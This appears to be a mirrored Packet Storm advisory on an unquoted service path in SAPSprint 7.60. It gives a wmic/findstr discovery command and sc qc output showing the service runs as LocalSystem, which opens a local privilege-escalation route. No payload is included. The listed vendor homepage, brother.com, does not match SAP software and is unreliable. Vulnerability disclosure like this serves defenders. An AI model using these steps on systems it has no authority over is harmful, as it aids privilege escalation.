WHAT ARE YOU LOOKING FOR?

SAPSprint 7.60 Unquoted Service Path ≈ Packet Storm

Roger Wilco Exploits 25 juin 2021 Affichages : 447

# Exploit Title: SAPSprint 7.60 - 'SAPSprint' Unquoted Service Path
# Discovery by: Brian Rodriguez
# Date: 21-06-2021
# Vendor Homepage: https://brother.com/
# Tested Version: 7.60
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10 Enterprise 64 bits

# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

SAPSprint SAPSprint C:\Program Files\SAP\SAPSprint\sapsprint.exe Auto

C:\>sc qc SAPSprint
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: SAPSprint
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME: C:\Program Files\SAP\SAPSprint\sapsprint.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : SAPSprint
DEPENDENCIES : Spooler
SERVICE_START_NAME: LocalSystem

Pensée du jour :

Ce que l'homme a fait ,

l'homme peut le défaire.

"No secure path in the world"

WHAT ARE YOU LOOKING FOR?

SAPSprint 7.60 Unquoted Service Path ≈ Packet Storm

Follow us on

Most popular

Tiki Wiki CMS Groupware 21.1 Authentication Bypass ≈ Packet Storm

Aimeos Laravel Ecommerce Platform 2021.10 LTS SQL Injection ≈ Packet Storm

Jcow Social Network Cross Site Scripting ≈ Packet Storm

OpenSMTPD Out-Of-Bounds Read / Local Privilege Escalation ≈ Packet Storm

Phone Shop Sales Managements System 1.0 Shell Upload ≈ Packet Storm

Caldera: Red Team Emulation (Part 1)

Category

Popular Sections

About